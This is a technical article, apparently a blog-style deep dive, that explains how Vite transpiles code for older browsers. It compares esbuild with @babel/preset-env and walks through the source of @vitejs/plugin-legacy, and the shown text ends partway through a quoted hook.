
@vitejs/plugin-legacy

Vite Default Browser Support

During development, Vite leverages esbuild to transpile modules, using esnext as the target:

esbuild.ts
ts
// Remove optimization options for dev as we only need to transpile them,
// and for build as the final optimization is in `buildEsbuildPlugin`
export function esbuildPlugin(config: ResolvedConfig): Plugin {
  // pull the user options off the resolved config (simplified from the source)
  const { include, exclude, ...esbuildTransformOptions } =
    config.esbuild as ESBuildOptions;

  const filter = createFilter(
    include || /\.(m?ts|[jt]sx)$/,
    exclude || /\.js$/
  );
  const transformOptions: TransformOptions = {
    target: 'esnext',
    charset: 'utf8',
    ...esbuildTransformOptions,
    minify: false,
    minifyIdentifiers: false,
    minifySyntax: false,
    minifyWhitespace: false,
    treeShaking: false,
    // keepNames is not needed when minify is disabled.
    // Also transforming multiple times with keepNames enabled breaks
    // tree-shaking. (#9164)
    keepNames: false,
    supported: {
      ...defaultEsbuildSupported,
      ...esbuildTransformOptions.supported
    }
  };

  return {
    name: 'vite:esbuild',
    async transform(code, id) {
      if (filter(id) || filter(cleanUrl(id))) {
        const result = await transformWithEsbuild(
          code,
          id,
          transformOptions,
          undefined,
          config,
          server?.watcher
        );
        // return the transpiled code so the transform result is actually used
        return { code: result.code, map: result.map };
      }
    }
  };
}

During the development pre-bundling phase and in production builds, Vite defaults to targeting browsers that are widely available according to Baseline.

ts
import {
  ESBUILD_BASELINE_WIDELY_AVAILABLE_TARGET,
} from '../constants'

async function prepareEsbuildOptimizerRun(
  environment: Environment,
  depsInfo: Record<string, OptimizedDepInfo>,
  processingCacheDir: string,
  optimizerContext: { cancelled: boolean }
): Promise<{
  context?: BuildContext;
  idToExports: Record<string, ExportsData>;
}> {
  const context = await esbuild.context({
    absWorkingDir: process.cwd(),
    entryPoints: Object.keys(flatIdDeps),
    bundle: true,
    platform,
    define,
    format: 'esm',
    // See https://github.com/evanw/esbuild/issues/1921#issuecomment-1152991694
    banner:
      platform === 'node'
        ? {
            js: `import { createRequire } from 'module';const require = createRequire(import.meta.url);`
          }
        : undefined,
    target: ESBUILD_BASELINE_WIDELY_AVAILABLE_TARGET,
    external,
    logLevel: 'error',
    splitting: true,
    sourcemap: true,
    outdir: processingCacheDir,
    ignoreAnnotations: true,
    metafile: true,
    plugins,
    charset: 'utf8',
    ...esbuildOptions,
    supported: {
      ...defaultEsbuildSupported,
      ...esbuildOptions.supported
    }
  });
  // ... (context wiring and return trimmed)
}
The same constant backs the production default: build.target defaults to 'baseline-widely-available', which is resolved to the concrete browser list.

ts
import {
  ESBUILD_BASELINE_WIDELY_AVAILABLE_TARGET
} from './constants';

export const buildEnvironmentOptionsDefaults = Object.freeze({
  target: 'baseline-widely-available'
  // ...
});
export function resolveBuildEnvironmentOptions(
  raw: BuildEnvironmentOptions,
  logger: Logger,
  consumer: 'client' | 'server' | undefined
): ResolvedBuildEnvironmentOptions {
  const merged = mergeWithDefaults(
    {
      ...buildEnvironmentOptionsDefaults,
      cssCodeSplit: !raw.lib,
      minify: consumer === 'server' ? false : 'esbuild',
      ssr: consumer === 'server',
      emitAssets: consumer === 'client',
      createEnvironment: (name, config) =>
        new BuildEnvironment(name, config)
    } satisfies BuildEnvironmentOptions,
    raw
  );
  // handle special build targets
  if (merged.target === 'baseline-widely-available') {
    merged.target = ESBUILD_BASELINE_WIDELY_AVAILABLE_TARGET;
  }
  // ... (remaining resolution and return trimmed)
}
The constant itself records the Baseline browser versions:

ts
/**
 * The browser versions included in Baseline Widely Available as of 2025-05-01.
 *
 * This value would be bumped on each major release of Vite.
 *
 * The value is generated by `pnpm generate-target` script.
 */
export const ESBUILD_BASELINE_WIDELY_AVAILABLE_TARGET = [
  'chrome107',
  'edge107',
  'firefox104',
  'safari16'
];

This is also explained in Browser Support.

As you can see, Vite is committed to modern browsers: in both development and production it minimizes syntax transpilation as much as possible and leans on native ESM features.

Downgrade Tools

Vite leverages esbuild for module transpilation, so the target environments specified via the build.target option must be ones that esbuild accepts.

Esbuild Downgrades Transpilation

esbuild only supports converting most newer JavaScript syntax features down to es6 (es2015); es5 code is passed through as es5 rather than being upgraded, and no downgrade below es6 is performed. This is not because esbuild is incapable of it: es6 (2015) is by now widely supported across browsers, so evanw considers es5 downgrade support a low priority.
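
For instance, a quick sketch using esbuild's transform API (assuming esbuild is installed) shows this one-way lowering: the ES2020 nullish coalescing operator is converted, while the ES2015 const is left untouched.

js
import { transformSync } from 'esbuild';

// `a ?? b` (ES2020) is lowered for an es2015 target,
// but `const` (ES2015) stays: esbuild never goes down to es5.
const { code } = transformSync('const v = a ?? b;', { target: 'es2015' });
console.log(code);
// -> const v = a != null ? a : b;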

When target is es2015, esbuild does its best to convert syntax constructs to es2015. Note that @babel/preset-env also performs syntax conversion, but the two differ: esbuild adopts a more "conservative" strategy in exchange for very fast builds, which suits projects with strict build-performance requirements and relatively modern target environments; @babel/preset-env performs precise and comprehensive syntax conversion, which suits projects that must support older browsers, and its transpilation achieves broader browser compatibility than esbuild's.

@babel/preset-env Downgrades Transpilation

@babel/preset-env ensures semantic correctness through elaborate helper code. Besides downgrading syntax constructs, it supports async/await and generators (asynchronous syntax) through regenerator-runtime, and new es6+ APIs through core-js.
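
A minimal configuration sketch that enables all of this (the targets value is illustrative):

js
// babel.config.js (a minimal sketch)
module.exports = {
  presets: [
    [
      '@babel/preset-env',
      {
        targets: 'chrome 49',   // illustrative browser target
        useBuiltIns: 'usage',   // inject core-js polyfills on demand
        corejs: 3               // core-js major version to draw from
      }
    ]
  ]
};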

Syntax Structure Transpilation

Babel internally maintains, via the @babel/compat-data package, a json map from each syntax transform to the minimum browser versions that support the feature natively.

json
{
  // ...
  "transform-optional-chaining": {
    "chrome": "91",
    "opera": "77",
    "edge": "91",
    "firefox": "74",
    "safari": "13.1",
    "node": "16.9",
    "deno": "1.9",
    "ios": "13.4",
    "samsung": "16",
    "opera_mobile": "64",
    "electron": "13.0"
  }
  //...
}

When the browser version (target) specified by the consumer is lower than the minimum supported version in the map above, @babel/preset-env automatically transpiles that syntax construct.

For example, when target is chrome 90: according to the optional-chaining mapping above, the transform is needed below chrome 91, so @babel/preset-env transpiles the syntax.

optional-chaining translation example

js
function getUserCity(user) {
  return user?.address?.city;
}
js
function getUserCity(user) {
  var _user$address;

  return user === null || user === void 0
    ? void 0
    : (_user$address = user.address) === null || _user$address === void 0
      ? void 0
      : _user$address.city;
}
ES2015+ APIs Support

As with syntax transforms, @babel/preset-env uses the @babel/compat-data package to obtain the json map of es2015+ (es6+) API features and their minimum supported browser versions.

json
{
  "es6.array.copy-within": {
    "chrome": "45",
    "opera": "32",
    "edge": "12",
    "firefox": "32",
    "safari": "9",
    "node": "4",
    "deno": "1",
    "ios": "9",
    "samsung": "5",
    "rhino": "1.7.13",
    "opera_mobile": "32",
    "electron": "0.31"
  }
  // ...
}

When the browser version (target) specified by the consumer is lower than the minimum supported version in the map above, @babel/preset-env injects the corresponding core-js submodule into the output.

For example, when target is chrome 44: according to the array.copyWithin mapping above, the API is unavailable before chrome 45, so @babel/preset-env injects the es.array.copy-within submodule of core-js into the output.

array-copy-within translation example

js
const numbers = [1, 2, 3, 4, 5];
numbers.copyWithin(0, 3);
js
import 'core-js/modules/es.array.copy-within.js';
var numbers = [1, 2, 3, 4, 5];
numbers.copyWithin(0, 3);
Async Runtime Support

When @babel/preset-env processes async/await and generator syntax, it first performs a syntax transform whose intermediate output relies on generator helper functions. If the target provided by the consumer does not support generator syntax either, @babel/preset-env additionally injects a polyfill through regenerator-runtime.

The relevant json map:

json
{
  // ...
  "transform-async-to-generator": {
    "chrome": "55",
    "opera": "42",
    "edge": "15",
    "firefox": "52",
    "safari": "11",
    "node": "7.6",
    "deno": "1",
    "ios": "11",
    "samsung": "6",
    "opera_mobile": "42",
    "electron": "1.6"
  }
  // ...
}

When the browser version (target) specified by the consumer is lower than the minimum supported version in the map above, @babel/preset-env first performs the syntax transform.

For example, when target is chrome 54: according to the transform-async-to-generator mapping above, async functions are unavailable before chrome 55, so @babel/preset-env rewrites them into generator-based helper code. Chrome 54 supports generators natively (see the transform-regenerator map below), so no regenerator-runtime is injected at this point.

async-to-generator translation example

js
async function asyncHook() {
  await 1;
}
js
import 'core-js/modules/es.promise.js';

function asyncGeneratorStep(gen, resolve, reject, _next, _throw, key, arg) {
  try {
    var info = gen[key](arg);
    var value = info.value;
  } catch (error) {
    reject(error);
    return;
  }
  if (info.done) {
    resolve(value);
  } else {
    Promise.resolve(value).then(_next, _throw);
  }
}

function _asyncToGenerator(fn) {
  return function () {
    var self = this,
      args = arguments;
    return new Promise(function (resolve, reject) {
      var gen = fn.apply(self, args);
      function _next(value) {
        asyncGeneratorStep(
          gen,
          resolve,
          reject,
          _next,
          _throw,
          'next',
          value
        );
      }
      function _throw(err) {
        asyncGeneratorStep(
          gen,
          resolve,
          reject,
          _next,
          _throw,
          'throw',
          err
        );
      }
      _next(undefined);
    });
  };
}

function asyncHook() {
  return _asyncHook.apply(this, arguments);
}

function _asyncHook() {
  _asyncHook = _asyncToGenerator(function* () {
    yield 1;
  });
  return _asyncHook.apply(this, arguments);
}

From the transpiled output we can see that with target chrome 54, @babel/preset-env transpiles the syntax structure and implements async/await purely through generator helper functions.

The relevant json map:

json
{
  // ...
  "transform-regenerator": {
    "chrome": "50",
    "opera": "37",
    "edge": "13",
    "firefox": "53",
    "safari": "10",
    "node": "6",
    "deno": "1",
    "ios": "10",
    "samsung": "5",
    "opera_mobile": "37",
    "electron": "1.1"
  }
  // ...
}

But when target is chrome 49, generators themselves are unsupported, so @babel/preset-env performs the syntax transform again and this time also injects a polyfill through regenerator-runtime to achieve a more thorough downgrade.

js
async function asyncHook() {
  await 1;
}
js
import 'regenerator-runtime/runtime.js';
import 'core-js/modules/es.promise.js';

function asyncGeneratorStep(gen, resolve, reject, _next, _throw, key, arg) {
  try {
    var info = gen[key](arg);
    var value = info.value;
  } catch (error) {
    reject(error);
    return;
  }
  if (info.done) {
    resolve(value);
  } else {
    Promise.resolve(value).then(_next, _throw);
  }
}

function _asyncToGenerator(fn) {
  return function () {
    var self = this,
      args = arguments;
    return new Promise(function (resolve, reject) {
      var gen = fn.apply(self, args);
      function _next(value) {
        asyncGeneratorStep(
          gen,
          resolve,
          reject,
          _next,
          _throw,
          'next',
          value
        );
      }
      function _throw(err) {
        asyncGeneratorStep(
          gen,
          resolve,
          reject,
          _next,
          _throw,
          'throw',
          err
        );
      }
      _next(undefined);
    });
  };
}

function asyncHook() {
  return _asyncHook.apply(this, arguments);
}

function _asyncHook() {
  _asyncHook = _asyncToGenerator(
    /*#__PURE__*/ regeneratorRuntime.mark(function _callee() {
      return regeneratorRuntime.wrap(function _callee$(_context) {
        while (1)
          switch ((_context.prev = _context.next)) {
            case 0:
              _context.next = 2;
              return 1;

            case 2:
            case 'end':
              return _context.stop();
          }
      }, _callee);
    })
  );
  return _asyncHook.apply(this, arguments);
}

Downgrade Tools Summary

  1. esbuild

    esbuild adopts a relatively conservative conversion strategy. It mainly downgrades newer JavaScript syntax features to es2015 (es6), without further downgrading to es5 (2009).

    This decision is based on three considerations:

    1. es2015 (es6) is already widely supported across browsers, so downgrading to es5 (2009) is a low priority.
    2. Transpilation performance comes first.
    3. Keeping the output concise benefits readability and debuggability.

    Because of this, esbuild can achieve extremely fast build speeds, especially suitable for projects with high build performance requirements and relatively modern target environments.

  2. @babel/preset-env

    @babel/preset-env provides a more comprehensive and precise conversion solution. Its conversion process can be divided into three main parts:

    1. Syntax Structure Conversion: Through maintaining detailed browser version mapping tables, it automatically decides whether to convert specific syntax structures based on the target environment.

    2. ES2015+ API Support: Also based on browser version mapping tables, but the handling method is to inject relevant submodules of core-js to provide polyfill.

    3. Asynchronous Syntax Support: For asynchronous features like async/await and generators, it adopts a two-layer strategy:

      • First, it converts the syntax structure just as in the previous steps. If the converted structure is still not supported by the target environment, it introduces regenerator-runtime for runtime support.
      • If the target environment does support the transpiled structure, regenerator-runtime is not introduced.

Comparison between the two:

  1. Conversion Strategy:

    • esbuild: Adopts a "conservative" strategy, converting down to es2015 but no further.
    • @babel/preset-env: Adopts a "precise and comprehensive" strategy that can convert precisely to any target version.
  2. Performance:

    • esbuild: Known for extremely fast build speeds.
    • @babel/preset-env: Due to the need for more complex conversion and analysis, build speed is relatively slower, and the transpiled output is larger.
  3. Compatibility Support:

    • esbuild: Suitable for projects with relatively modern target environments.
    • @babel/preset-env: Through a complex polyfill system, can support lower version browsers.
  4. Completeness of Conversion:

    • @babel/preset-env will generate complete helper functions and private field implementations to ensure complete functional equivalence.
    • esbuild may adopt simplified conversion schemes, sometimes unable to fully maintain the semantics of the original code.
  5. Usage Scenarios:

    • esbuild: Suitable for modern projects with high build performance requirements and relatively modern target environments.
    • @babel/preset-env: Suitable for projects that need to support a wider range of browsers, especially scenarios that need to be compatible with older version browsers.

From an engineering perspective, the choice of tool should be driven by the project's needs. If the project must support older browsers and build performance is not critical, @babel/preset-env is recommended. If the project mainly targets modern browsers and build performance matters, esbuild is the better choice. And if the project must support both older and modern browsers while keeping transpilation reasonably fast, consider combining the two to leverage their respective strengths.

esbuild's target handling is not entirely reliable: even with target set to es2015, esbuild may let some newer syntax features pass through unchanged or convert them incompletely.

Vite is a development tool that serves applications, so it must take browser compatibility into account while keeping transpilation fast. It therefore combines the strengths of both: esbuild performs syntax transpilation during the build phase, and consumers who need strict browser support can bring in @babel/preset-env (via @vitejs/plugin-legacy) to complete the syntax downgrade.

Polyfill Mechanism

Legacy browsers can be supported through the @vitejs/plugin-legacy plugin, which automatically generates legacy chunks and the corresponding polyfills for ECMAScript language features. Legacy chunks are loaded on demand, and only in browsers without native esm support.
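
A typical setup follows the plugin's documented usage (the targets value is illustrative):

js
// vite.config.js
import legacy from '@vitejs/plugin-legacy';

export default {
  plugins: [
    legacy({
      // browserslist query describing the legacy browsers to support
      targets: ['defaults', 'not IE 11']
    })
  ]
};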

Balancing Between Optimization And Browser Compatibility

Generally, a more modern JavaScript target requires less transpiled code, because more features can be used directly without conversion. When determining a project's target environment, choosing a more modern target where possible not only reduces the size of the built output but also keeps it readable and maintainable. Of course, this must be balanced against the browsers your target users actually run.
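
In a plain Vite project this trade-off is expressed through build.target, for example:

js
// vite.config.js (a sketch; pick the most modern target your users allow)
export default {
  build: {
    // esbuild-style targets: an ES version and/or specific browser versions
    target: ['es2020', 'chrome87', 'safari14']
  }
};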

Syntax Alternatives

To implement downgrade operations for the output, the main downgrade considerations are as follows:

  1. Downgrade of esm loader

    esm can be downgraded by substituting systemjs. systemjs is an esm loader that simulates the loading behavior of the browser's native <script type="module">, at a speed close to the native loader. It supports TLA, dynamic import, circular references, live bindings, import.meta.url, module types, import maps, integrity, and CSP. It is a fairly complete esm loader that remains compatible with older browsers (down to IE11).

    So we can take the following script, served to modern browsers that support esm,

    html
    <script
      crossorigin
      type="module"
      src="/assets/index-legacy-sCTV4F-O.js"
    ></script>

    and downgrade it for browsers without esm support in the following way:

    html
    <script
      nomodule
      crossorigin
      id="vite-legacy-entry"
      data-src="/assets/index-legacy-sCTV4F-O.js"
    >
      System.import(
        document.getElementById('vite-legacy-entry').getAttribute('data-src')
      );
    </script>

    A nomodule script is one that only browsers without esm support should execute. There is, however, a special case in Safari 10.1, which is explained in detail below.

  2. ECMAScript 2015+ Syntax Downgrade

    @babel/preset-env is responsible for downgrading es6+ code, transpiling the syntax features itself:

    js
    // input
    const arrow = () => {};
    
    // transformed
    var arrow = function arrow() {};
    js
    // input
    const { x, y } = point;
    
    // transformed
    var _point = point,
      x = _point.x,
      y = _point.y;
    js
    // input
    const message = `Hello ${name}`;
    
    // transformed
    var message = 'Hello '.concat(name);
    js
    // input
    const value = obj?.prop?.field;
    
    // transformed
    var value =
      (_obj = obj) === null || _obj === void 0
        ? void 0
        : (_obj$prop = _obj.prop) === null || _obj$prop === void 0
          ? void 0
          : _obj$prop.field;

    When encountering new es6+ APIs, it injects polyfills through core-js.

    js
    // input
    const numbers = [1, 2, 3];
    numbers.includes(2);
    
    // transformed
    import 'core-js/modules/es.array.includes.js';
    var numbers = [1, 2, 3];
    numbers.includes(2);
    js
    // input
    const set = new Set([1, 2, 3]);
    
    // transformed
    import 'core-js/modules/es.array.iterator.js';
    import 'core-js/modules/es.object.to-string.js';
    import 'core-js/modules/es.set.js';
    import 'core-js/modules/es.string.iterator.js';
    import 'core-js/modules/web.dom-collections.iterator.js';
    var set = new Set([1, 2, 3]);
    js
    // input
    const arr = Array.from({});
    
    // transformed
    import 'core-js/modules/es.array.from.js';
    import 'core-js/modules/es.string.iterator.js';
    var arr = Array.from({});
    js
    // input
    const obj = { a: 1, b: 2 };
    Object.entries(obj);
    Object.values(obj);
    
    // transformed
    import 'core-js/modules/es.object.entries.js';
    import 'core-js/modules/es.object.values.js';
    var obj = {
      a: 1,
      b: 2
    };
    Object.entries(obj);
    Object.values(obj);

    When encountering generators or async/await features, it injects a polyfill through regenerator-runtime.

    js
    // input
    function* generate() {}
    
    // transformed
    import 'regenerator-runtime/runtime.js';
    
    var _marked = /*#__PURE__*/ regeneratorRuntime.mark(generate);
    
    function generate() {
      return regeneratorRuntime.wrap(function generate$(_context) {
        while (1) {
          switch ((_context.prev = _context.next)) {
            case 0:
            case 'end':
              return _context.stop();
          }
        }
      }, _marked);
    }
    js
    // input
    async function asyncFunction() {
      await 1;
    }
    
    // transformed
    import 'regenerator-runtime/runtime.js';
    import 'core-js/modules/es.object.to-string.js';
    import 'core-js/modules/es.promise.js';
    
    function asyncGeneratorStep(
      gen,
      resolve,
      reject,
      _next,
      _throw,
      key,
      arg
    ) {
      try {
        var info = gen[key](arg);
        var value = info.value;
      } catch (error) {
        reject(error);
        return;
      }
      if (info.done) {
        resolve(value);
      } else {
        Promise.resolve(value).then(_next, _throw);
      }
    }
    
    function _asyncToGenerator(fn) {
      return function () {
        var self = this,
          args = arguments;
        return new Promise(function (resolve, reject) {
          var gen = fn.apply(self, args);
          function _next(value) {
            asyncGeneratorStep(
              gen,
              resolve,
              reject,
              _next,
              _throw,
              'next',
              value
            );
          }
          function _throw(err) {
            asyncGeneratorStep(
              gen,
              resolve,
              reject,
              _next,
              _throw,
              'throw',
              err
            );
          }
          _next(undefined);
        });
      };
    }
    
    function asyncFunction() {
      return _asyncFunction.apply(this, arguments);
    }
    
    function _asyncFunction() {
      _asyncFunction = _asyncToGenerator(
        /*#__PURE__*/ regeneratorRuntime.mark(function _callee() {
          return regeneratorRuntime.wrap(function _callee$(_context) {
            while (1) {
              switch ((_context.prev = _context.next)) {
                case 0:
                  _context.next = 2;
                  return 1;
    
                case 2:
                case 'end':
                  return _context.stop();
              }
            }
          }, _callee);
        })
      );
      return _asyncFunction.apply(this, arguments);
    }

    Through @babel/preset-env, es6+ syntax can thus be downgraded to es5 much more completely.

Plugin Work Mechanism

The @vitejs/plugin-legacy plugin generates a legacy chunk for each chunk in the renderChunk phase. It leverages @babel/preset-env to analyze the chunk and, on finding a feature the target environment does not support, injects a polyfill through core-js or regenerator-runtime.

js
const numbers = [1, 2, 3];
Promise.resolve(1);
function* generate() {}
console.log(numbers.includes(2));
js
import 'regenerator-runtime/runtime.js';

var _marked = /*#__PURE__*/ regeneratorRuntime.mark(generate);

import 'core-js/modules/es.object.to-string.js';
import 'core-js/modules/es.promise.js';
import 'core-js/modules/es.array.includes.js';
var numbers = [1, 2, 3];
Promise.resolve(1);

function generate() {
  return regeneratorRuntime.wrap(function generate$(_context) {
    while (1) {
      switch ((_context.prev = _context.next)) {
        case 0:
        case 'end':
          return _context.stop();
      }
    }
  }, _marked);
}

console.log(numbers.includes(2));

Polyfills are injected on demand as import statements for core-js submodules and the regenerator-runtime module. At this point we could re-bundle the chunk dependency graph from the entry through the build tool and, with some configuration, gather these on-demand polyfill imports into a single polyfill bundle. But that would add complexity, so the @vitejs/plugin-legacy plugin adopts a simpler approach.

While transpiling es6+ code, the @babel/preset-env preset emits on-demand imports of core-js submodules and the regenerator-runtime module. We can therefore write a babel plugin that runs after @babel/preset-env finishes, analyzes the transpiled chunk, and collects those polyfill dependencies. Once they are collected, the import statements are removed from the chunk, and the collected polyfill modules are later bundled into a standalone polyfill bundle.

In other words, the polyfill bundle contains the systemjs runtime plus the core-js polyfills actually used in the source code.
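
Conceptually, the virtual polyfill entry the plugin assembles looks like this (the core-js module names are illustrative; the real list is whatever was collected from the legacy chunks):

js
// sketch of the generated virtual polyfill module
import 'core-js/modules/es.array.includes.js';
import 'core-js/modules/es.promise.js';
import 'regenerator-runtime/runtime.js';
// the systemjs loader runtime is appended unless it is externalized
import 'systemjs/dist/s.min.js';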

In the renderChunk phase, the plugin also looks for the import.meta.env.LEGACY marker in each chunk and replaces it with a boolean literal, marking whether the current script is running in a legacy environment.

The final step is to inject the polyfill bundle and the legacy bundle into the html. Because module-capable browsers skip nomodule scripts, the <script nomodule> tag lets us selectively load the polyfills and execute the legacy bundle only in the targeted legacy browsers.

Implementation Approach

The @vitejs/plugin-legacy plugin has three built-in plugins: legacyConfigPlugin, legacyGenerateBundlePlugin, and legacyPostPlugin.

js
// @vitejs/plugin-legacy

function viteLegacyPlugin(options = {}) {
  const legacyConfigPlugin = {
    // ...
  };

  const legacyGenerateBundlePlugin = {
    // ...
  };

  const legacyPostPlugin = {
    // ...
  };

  return [legacyConfigPlugin, legacyGenerateBundlePlugin, legacyPostPlugin];
}

export { cspHashes, viteLegacyPlugin as default, detectPolyfills };

Let's analyze what each plugin does specifically.

legacyConfigPlugin

The plugin will process in the config and configResolved phases.

ts
const genLegacy = options.renderLegacyChunks !== false

// browsers supporting ESM + dynamic import + import.meta + async generator
const modernTargetsEsbuild = [
  'es2020',
  'edge79',
  'firefox67',
  'chrome64',
  'safari12',
]

const legacyConfigPlugin: Plugin = {
  name: 'vite:legacy-config',

  async config(config, env) {
    if (env.command === 'build' && !config.build?.ssr) {
      if (!config.build) {
        config.build = {};
      }

      if (!config.build.cssTarget) {
        // Hint for esbuild that we are targeting legacy browsers when minifying CSS.
        // Full CSS compat table available at https://github.com/evanw/esbuild/blob/78e04680228cf989bdd7d471e02bbc2c8d345dc9/internal/compat/css_table.go
        // But note that only the `HexRGBA` feature affects the minify outcome.
        // HSL & rebeccapurple values will be minified away regardless the target.
        // So targeting `chrome61` suffices to fix the compatibility issue.
        config.build.cssTarget = 'chrome61';
      }

      if (genLegacy) {
        // Vite's default target browsers are **not** the same.
        // See https://github.com/vitejs/vite/pull/10052#issuecomment-1242076461
        overriddenBuildTarget = config.build.target !== undefined;
        overriddenDefaultModernTargets =
          options.modernTargets !== undefined;

        if (options.modernTargets) {
          // Package is ESM only
          const { default: browserslistToEsbuild } = await import(
            'browserslist-to-esbuild'
          );
          config.build.target = browserslistToEsbuild(
            options.modernTargets
          );
        } else {
          config.build.target = modernTargetsEsbuild;
        }
      }
    }

    return {
      define: {
        'import.meta.env.LEGACY':
          env.command === 'serve' || config.build?.ssr
            ? false
            : legacyEnvVarMarker
      }
    };
  },
  configResolved(config) {
    if (overriddenBuildTarget) {
      config.logger.warn(
        colors.yellow(
          `plugin-legacy overrode 'build.target'. You should pass 'targets' as an option to this plugin with the list of legacy browsers to support instead.`
        )
      );
    }
    if (overriddenDefaultModernTargets) {
      config.logger.warn(
        colors.yellow(
          `plugin-legacy 'modernTargets' option overrode the builtin targets of modern chunks. Some versions of browsers between legacy and modern may not be supported.`
        )
      );
    }
  }
};

The implementation logic of this plugin is relatively simple, mainly doing three things:

  1. Set the CSS compatibility version to chrome61 by default.

    A typical compatibility target is the webview inside Android WeChat: it supports most modern JavaScript features, but not the CSS #RGBA hexadecimal color notation.

    In that case we need to set build.cssTarget to chrome61 during the build phase (#RGBA is not supported before chrome 62), preventing esbuild from minifying rgba() colors into the #RGBA hex notation. If the user has already configured cssTarget, nothing is overridden.

    Here's the explanation and suggestion from the esbuild documentation:

    Simply put, by default esbuild's output uses all modern CSS features, e.g. minifying color: rgba() values and emitting CSS nesting syntax. If that cannot satisfy the user agents you must support (mostly browsers), you need to give esbuild a specific build target, configurable as build.cssTarget in Vite.

  2. Compatibility Environment Target Retrieval

    Through the browserslist-to-esbuild package, the browserslist query given as options.modernTargets is converted into esbuild targets and assigned to config.build.target; when the option is absent, a built-in list of modern targets is used instead.

  3. import.meta.env.LEGACY Marker Injection

    Globally inject the import.meta.env.LEGACY constant. During a build it is defined as the marker __VITE_IS_LEGACY__, which the renderChunk phase later replaces with a concrete boolean; in dev and ssr it is simply defined as false. Application code can branch on this marker, as shown below.
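
For example, application code can branch on the marker like this (the console branches are illustrative):

js
// app code (a sketch): the marker is statically replaced per chunk,
// so the dead branch can be tree-shaken away
if (import.meta.env.LEGACY) {
  console.log('running the legacy (systemjs) build');
} else {
  console.log('running the modern (native esm) build');
}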

legacyPostPlugin

The source code structure is as follows. In the post phase of the build, the plugin implements five hooks: renderStart, configResolved, renderChunk, transformIndexHtml, and generateBundle.

js
const legacyPostPlugin = {
  name: 'vite:legacy-post-process',
  enforce: 'post',
  apply: 'build',
  renderStart() {
    // ...
  },
  configResolved(_config) {
    // ...
  },
  async renderChunk(raw, chunk, opts) {
    // ...
  },
  transformIndexHtml(html, { chunk }) {
    // ...
  },
  generateBundle(opts, bundle) {
    // ...
  }
};

Configuration Handling

In the configResolved hook, the plugin rejects lib mode and skips ssr builds as well as configurations that don't require legacy output (options.renderLegacyChunks === false).

ts
const genLegacy = options.renderLegacyChunks !== false;
if (_config.build.lib) {
  throw new Error('@vitejs/plugin-legacy does not support library mode.');
}
config = _config;

modernTargets = options.modernTargets || modernTargetsBabel;
if (isDebug) {
  console.log(`[@vitejs/plugin-legacy] modernTargets:`, modernTargets);
}

if (!genLegacy || config.build.ssr) {
  return;
}

If no targets option is provided to the plugin, it uses the browserslist package to load the target browser versions that the downgrade should cover.

ts
/**
 * 1. Get the configuration items in package.json under the root directory.
 * config = module[package.json]
 * 2. Parse the configuration items in package.json
 * return (
 *  config[process.env.BROWSERSLIST_ENV] ||
 *  config[process.env.NODE_ENV] ||
 *  config["production"] ||
 *  config.defaults
 * )
 */
targets =
  options.targets ||
  browserslistLoadConfig({ path: config.root }) ||
  'last 2 versions and not dead, > 0.3%, Firefox ESR';

Based on the rollupOptions.output configuration, it then determines the output file names for the legacy output.

ts
const genModern = options.renderModernChunks !== false;
const { rollupOptions } = config.build;
const { output } = rollupOptions;
if (Array.isArray(output)) {
  rollupOptions.output = [
    ...output.map(createLegacyOutput),
    ...(genModern ? output : [])
  ];
} else {
  rollupOptions.output = [
    createLegacyOutput(output),
    ...(genModern ? [output || {}] : [])
  ];
}

Each entry will generate a corresponding legacy output, and it will decide whether to generate modern output (non-legacy output) based on the value of genModern.

ts
const createLegacyOutput = (options: OutputOptions = {}): OutputOptions => {
  return {
    ...options,
    format: 'system',
    entryFileNames: getLegacyOutputFileName(options.entryFileNames),
    chunkFileNames: getLegacyOutputFileName(options.chunkFileNames)
  };
};

Note that the output format for legacy chunks is system, a special output format that rollup handles specially. It also lets us distinguish legacy chunks from modern chunks later by checking a chunk's output format.

system format

rollup supports the system output format: it emits modules in the systemjs module format, so esm semantics can be provided by the systemjs loader in legacy browsers. The transpiled output is wrapped in a System.register call, and the systemjs runtime itself is shipped in the polyfill bundle.

Before transpilation:

ts
console.log(1);

After transpilation:

ts
System.register([], function () {
  'use strict';
  return {
    execute() {
      console.log(1);
    }
  };
});

The naming rules for legacy output are as follows:

ts
const getLegacyOutputFileName = (
  fileNames: string | ((chunkInfo: PreRenderedChunk) => string) | undefined,
  defaultFileName = '[name]-legacy-[hash].js'
): string | ((chunkInfo: PreRenderedChunk) => string) => {
  if (!fileNames) {
    return path.posix.join(config.build.assetsDir, defaultFileName);
  }

  return chunkInfo => {
    let fileName =
      typeof fileNames === 'function' ? fileNames(chunkInfo) : fileNames;

    if (fileName.includes('[name]')) {
      // [name]-[hash].[format] -> [name]-legacy-[hash].[format]
      fileName = fileName.replace('[name]', '[name]-legacy');
    } else if (nonLeadingHashInFileNameRE.test(fileName)) {
      // custom[hash].[format] -> [name]-legacy[hash].[format]
      // custom-[hash].[format] -> [name]-legacy-[hash].[format]
      // custom.[hash].[format] -> [name]-legacy.[hash].[format]
      // custom.[hash:10].[format] -> custom-legacy.[hash:10].[format]
      fileName = fileName.replace(prefixedHashInFileNameRE, '-legacy$&');
    } else {
      // entry.js -> entry-legacy.js
      // entry.min.js -> entry-legacy.min.js
      fileName = fileName.replace(/(.+?)\.(.+)/, '$1-legacy.$2');
    }

    return fileName;
  };
};

The comments in the source already explain the naming rules in detail, so I won't repeat them here.

The complete code for the configResolved hook of legacyPostPlugin is as follows:

ts
const legacyPostPlugin: Plugin = {
  name: 'vite:legacy-post-process',
  enforce: 'post',
  apply: 'build',

  configResolved(_config) {
    if (_config.build.lib) {
      throw new Error(
        '@vitejs/plugin-legacy does not support library mode.'
      );
    }
    config = _config;

    modernTargets = options.modernTargets || modernTargetsBabel;
    if (isDebug) {
      console.log(`[@vitejs/plugin-legacy] modernTargets:`, modernTargets);
    }

    if (!genLegacy || config.build.ssr) {
      return;
    }

    targets =
      options.targets ||
      browserslistLoadConfig({ path: config.root }) ||
      'last 2 versions and not dead, > 0.3%, Firefox ESR';
    if (isDebug) {
      console.log(`[@vitejs/plugin-legacy] targets:`, targets);
    }

    const getLegacyOutputFileName = (
      fileNames:
        | string
        | ((chunkInfo: PreRenderedChunk) => string)
        | undefined,
      defaultFileName = '[name]-legacy-[hash].js'
    ): string | ((chunkInfo: PreRenderedChunk) => string) => {
      if (!fileNames) {
        return path.posix.join(config.build.assetsDir, defaultFileName);
      }

      return chunkInfo => {
        let fileName =
          typeof fileNames === 'function'
            ? fileNames(chunkInfo)
            : fileNames;

        if (fileName.includes('[name]')) {
          // [name]-[hash].[format] -> [name]-legacy-[hash].[format]
